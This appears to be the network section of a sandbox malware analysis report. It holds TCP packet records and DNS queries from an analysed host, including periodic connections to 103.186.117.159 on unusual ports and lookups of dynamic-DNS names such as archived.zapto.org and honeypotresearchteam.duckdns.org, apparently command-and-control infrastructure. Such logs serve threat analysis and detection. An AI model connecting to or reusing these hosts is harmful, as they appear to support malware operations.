Nov 26, 2024 08:12:22.944367886 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:22.965253115 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:22.965346098 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:22.981666088 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:22.981762886 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:22.996880054 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:22.996972084 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.013199091 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.013267040 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.022505999 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.022641897 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.062859058 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.062935114 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.072184086 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.072266102 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.139699936 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.139925003 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.148756027 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.148838997 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.156455040 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.156531096 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.165839911 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.165930986 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.174715042 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.175004959 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.182399035 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.182485104 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.189579964 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.189665079 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.197081089 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.197159052 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.202809095 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.202898026 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.226145983 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.226258993 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.231771946 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.231844902 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.324596882 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.324704885 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.329087019 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.329183102 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.333744049 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.333862066 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.338529110 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.338639021 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.343276978 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.343378067 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.349291086 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.349380970 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.354718924 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.354804993 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.360008955 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.360100031 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.364701033 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.364784002 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.368818045 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.368917942 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.373900890 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.373999119 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.378447056 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.378534079 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.382823944 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.382908106 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.414202929 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.414423943 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.418025017 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.418116093 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.421883106 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.421960115 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.516926050 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.517092943 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.520045996 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.520149946 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.523701906 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.523834944 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.527298927 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.527395964 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.532260895 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.532356024 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.535854101 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.535953045 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.539798975 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.539889097 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.544961929 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.545196056 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.548310041 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.548398018 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.551615000 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.551693916 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.555800915 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.555906057 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.559544086 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.559638977 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.563235998 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.563337088 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.567970037 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.568057060 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.607459068 CET  443    49746  162.19.139.102  192.168.2.9
Nov 26, 2024 08:12:23.607530117 CET  49746  443    192.168.2.9     162.19.139.102
Nov 26, 2024 08:12:23.611073971 CET  443    49746  162.19.139.102  192.168.2.9
                                                                      Nov 26, 2024 08:12:23.611166000 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:23.615848064 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:23.615917921 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:23.710870981 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:23.711025953 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:23.714230061 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:23.714329004 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:23.717596054 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:23.717689037 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:23.722179890 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:23.722273111 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:23.725440025 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:23.725522995 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:23.729049921 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:23.729141951 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:23.732270002 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:23.732361078 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:23.736767054 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:23.736856937 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:23.740180016 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:23.740258932 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:23.744041920 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:23.744124889 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:23.747601986 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:23.747699022 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:23.750967026 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:23.751063108 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:23.755337954 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:23.755426884 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:23.798105001 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:23.798285961 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:23.801523924 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:23.801629066 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:23.804913044 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:23.805008888 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:23.901700974 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:23.901865959 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:23.905395031 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:23.905476093 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:23.908761024 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:23.908828020 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:23.912237883 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:23.912319899 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:23.915591002 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:23.915658951 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:23.919949055 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:23.920022011 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:23.923336983 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:23.923403978 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:23.926808119 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:23.926882982 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:23.931096077 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:23.931169987 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:23.934539080 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:23.934606075 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:23.938391924 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:23.938462973 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:23.941767931 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:23.941838980 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:23.945250034 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:23.945334911 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:23.991919994 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:23.992116928 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:23.993545055 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:23.993613005 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:23.997162104 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:23.997253895 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.094357967 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.094449997 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.097054958 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.097125053 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.100771904 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.100857973 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.103832960 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.103948116 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.108264923 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.108375072 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.111561060 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.111655951 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.114959955 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.115057945 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.119349003 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.119453907 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.122684002 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.122752905 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.126288891 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.126358032 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.129959106 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.130065918 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.133404970 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.133471012 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.136828899 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.136897087 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.141571045 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.141669035 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.183351040 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.183531046 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.188628912 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.188709021 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.192465067 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.192553043 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.288080931 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.288171053 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.291673899 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.291747093 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.294838905 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.294926882 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.299213886 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.299447060 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.302700996 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.302783966 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.306041956 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.306127071 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.309340000 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.309418917 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.313813925 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.313890934 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.317015886 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.317110062 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.321014881 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.321089029 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.324434996 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.324508905 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.327809095 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.327893019 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.332101107 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.332228899 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.375081062 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.375235081 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.378634930 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.378783941 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.381778002 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.381860018 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.479784966 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.479895115 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.483099937 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.483242035 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.486728907 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.486826897 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.489937067 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.490041971 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.495506048 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.495609045 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.497945070 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.498042107 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.501343012 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.501463890 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.505489111 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.505597115 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.508866072 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.508968115 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.512387991 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.512526989 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.516036034 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.516144037 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.516155005 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.516170979 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.516252995 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.516279936 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.516295910 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:24.516314983 CET49746443192.168.2.9162.19.139.102
                                                                      Nov 26, 2024 08:12:24.516321898 CET44349746162.19.139.102192.168.2.9
                                                                      Nov 26, 2024 08:12:29.077389002 CET4976356796192.168.2.9103.186.117.159
                                                                      Nov 26, 2024 08:12:29.198652029 CET5679649763103.186.117.159192.168.2.9
                                                                      Nov 26, 2024 08:12:29.198750019 CET4976356796192.168.2.9103.186.117.159
                                                                      Nov 26, 2024 08:12:29.204001904 CET4976356796192.168.2.9103.186.117.159
                                                                      Nov 26, 2024 08:12:29.323887110 CET5679649763103.186.117.159192.168.2.9
                                                                      Nov 26, 2024 08:12:51.132211924 CET5679649763103.186.117.159192.168.2.9
                                                                      Nov 26, 2024 08:12:51.132302999 CET4976356796192.168.2.9103.186.117.159
                                                                      Nov 26, 2024 08:12:51.135348082 CET4976356796192.168.2.9103.186.117.159
                                                                      Nov 26, 2024 08:12:51.255237103 CET5679649763103.186.117.159192.168.2.9
                                                                      Nov 26, 2024 08:12:51.910763025 CET4981313939192.168.2.9103.186.117.159
                                                                      Nov 26, 2024 08:12:52.030858994 CET1393949813103.186.117.159192.168.2.9
                                                                      Nov 26, 2024 08:12:52.031157970 CET4981313939192.168.2.9103.186.117.159
                                                                      Nov 26, 2024 08:12:52.034755945 CET4981313939192.168.2.9103.186.117.159
                                                                      Nov 26, 2024 08:12:52.154709101 CET1393949813103.186.117.159192.168.2.9
                                                                      Nov 26, 2024 08:13:14.034374952 CET1393949813103.186.117.159192.168.2.9
                                                                      Nov 26, 2024 08:13:14.034543037 CET4981313939192.168.2.9103.186.117.159
                                                                      Nov 26, 2024 08:13:14.034650087 CET4981313939192.168.2.9103.186.117.159
                                                                      Nov 26, 2024 08:13:14.154624939 CET1393949813103.186.117.159192.168.2.9
                                                                      Nov 26, 2024 08:13:15.046561956 CET4982356796192.168.2.9103.186.117.159
                                                                      Nov 26, 2024 08:13:15.167076111 CET5679649823103.186.117.159192.168.2.9
                                                                      Nov 26, 2024 08:13:15.167237043 CET4982356796192.168.2.9103.186.117.159
                                                                      Nov 26, 2024 08:13:15.170892000 CET4982356796192.168.2.9103.186.117.159
                                                                      Nov 26, 2024 08:13:15.291397095 CET5679649823103.186.117.159192.168.2.9
                                                                      Nov 26, 2024 08:13:37.080526114 CET5679649823103.186.117.159192.168.2.9
                                                                      Nov 26, 2024 08:13:37.080638885 CET4982356796192.168.2.9103.186.117.159
                                                                      Nov 26, 2024 08:13:37.108644962 CET4982356796192.168.2.9103.186.117.159
                                                                      Nov 26, 2024 08:13:37.228538036 CET5679649823103.186.117.159192.168.2.9
                                                                      Nov 26, 2024 08:13:37.254262924 CET4982413939192.168.2.9103.186.117.159
                                                                      Nov 26, 2024 08:13:37.374209881 CET1393949824103.186.117.159192.168.2.9
                                                                      Nov 26, 2024 08:13:37.375227928 CET4982413939192.168.2.9103.186.117.159
                                                                      Nov 26, 2024 08:13:37.382916927 CET4982413939192.168.2.9103.186.117.159
                                                                      Nov 26, 2024 08:13:37.503371000 CET1393949824103.186.117.159192.168.2.9
                                                                      Nov 26, 2024 08:13:59.329932928 CET1393949824103.186.117.159192.168.2.9
                                                                      Nov 26, 2024 08:13:59.329993963 CET4982413939192.168.2.9103.186.117.159
                                                                      Nov 26, 2024 08:13:59.330043077 CET4982413939192.168.2.9103.186.117.159
                                                                      Nov 26, 2024 08:13:59.449995995 CET1393949824103.186.117.159192.168.2.9
                                                                      Nov 26, 2024 08:14:00.343817949 CET4982556796192.168.2.9103.186.117.159
                                                                      Nov 26, 2024 08:14:00.463900089 CET5679649825103.186.117.159192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 26, 2024 08:12:11.334064960 CET | 192.168.2.9 | 1.1.1.1 | 0x5724 | Standard query (0) | alfanar01-my.sharepoint.com | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:12:19.968487024 CET | 192.168.2.9 | 1.1.1.1 | 0xd48c | Standard query (0) | lightstone.ae | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:12:28.738857031 CET | 192.168.2.9 | 1.1.1.1 | 0x55aa | Standard query (0) | pentester0.accesscam.org | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:12:41.249989033 CET | 192.168.2.9 | 1.1.1.1 | 0xfbd8 | Standard query (0) | pentester0.accesscam.org | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:12:51.162787914 CET | 192.168.2.9 | 1.1.1.1 | 0x1c19 | Standard query (0) | archived.zapto.org | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:12:51.422683001 CET | 192.168.2.9 | 1.1.1.1 | 0x48ee | Standard query (0) | honeypotresearchteam.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:13:37.109226942 CET | 192.168.2.9 | 1.1.1.1 | 0x8807 | Standard query (0) | archived.zapto.org | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:14:22.400125027 CET | 192.168.2.9 | 1.1.1.1 | 0xf772 | Standard query (0) | archived.zapto.org | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:14:22.632741928 CET | 192.168.2.9 | 1.1.1.1 | 0x82a8 | Standard query (0) | honeypotresearchteam.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:14:46.030692101 CET | 192.168.2.9 | 1.1.1.1 | 0x7185 | Standard query (0) | pentester0.accesscam.org | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:15:08.285502911 CET | 192.168.2.9 | 1.1.1.1 | 0x4be6 | Standard query (0) | archived.zapto.org | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:15:31.484304905 CET | 192.168.2.9 | 1.1.1.1 | 0x766b | Standard query (0) | pentester0.accesscam.org | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:15:53.928049088 CET | 192.168.2.9 | 1.1.1.1 | 0x63ce | Standard query (0) | archived.zapto.org | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:15:54.160147905 CET | 192.168.2.9 | 1.1.1.1 | 0x66d5 | Standard query (0) | honeypotresearchteam.duckdns.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 26, 2024 08:12:12.122469902 CET | 1.1.1.1 | 192.168.2.9 | 0x5724 | No error (0) | alfanar01-my.sharepoint.com | alfanar01.sharepoint.com | | CNAME (Canonical name) | IN (0x0001) | false
